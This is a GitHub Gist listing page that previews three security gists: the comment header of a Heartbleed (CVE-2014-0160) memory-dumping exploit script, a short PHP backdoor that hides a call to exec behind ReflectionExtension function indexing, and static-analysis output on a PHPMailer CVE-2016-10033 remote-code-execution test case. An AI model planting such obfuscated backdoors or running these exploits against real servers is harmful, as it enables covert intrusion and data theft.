redeemer cinu
cinu
/ ssl_heartbleed_dirty_dumper.py
Last active
April 5, 2025 05:49
— forked from LucaBongiorni/ssltest.py
SSL heartbleed dirty dumper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| # | |
| # Modified slightly by Andreas Thienemann <[email protected]> for clearer exploit code | |
| # and 64k reads | |
| # | |
| # This version of the exploit does write received data to a file called "dump" in the local directory | |
| # for analysis. |
cinu
/ reflectionextension_based_backdoor.php
Last active
October 15, 2022 19:51
Simple ReflectionExtension based PHP backdoor idea
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Simple ReflectionExtension based PHP backdoor idea | |
| $cmd = 'sleep 3'; | |
| $c = new ReflectionExtension('standard'); array_values($c->getFunctions())[0x75]->invokeArgs(array($cmd)); | |
| // Info: 0x75 == 117, which is exec function number on current os | |
| // Getting function number: | |
| /* |
cinu
/ CVE-2016-10033-phpsourcerer.txt
Created
December 28, 2016 11:17
PhpSourcerer (static code analysis tool) versus CVE-2016-10033 (PHPMailer < 5.2.18 Remote Code Execution)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ php phpsourcerer.php --version | |
| PhpSourcerer 0.1.1 | |
| $ cat ~/tmp/PHPMailer-5.2.17/CVE-2016-10033.php | |
| <?php | |
| $mail = new PHPMailer; | |
| $mail->setFrom($_POST['a'], $_POST['b']); |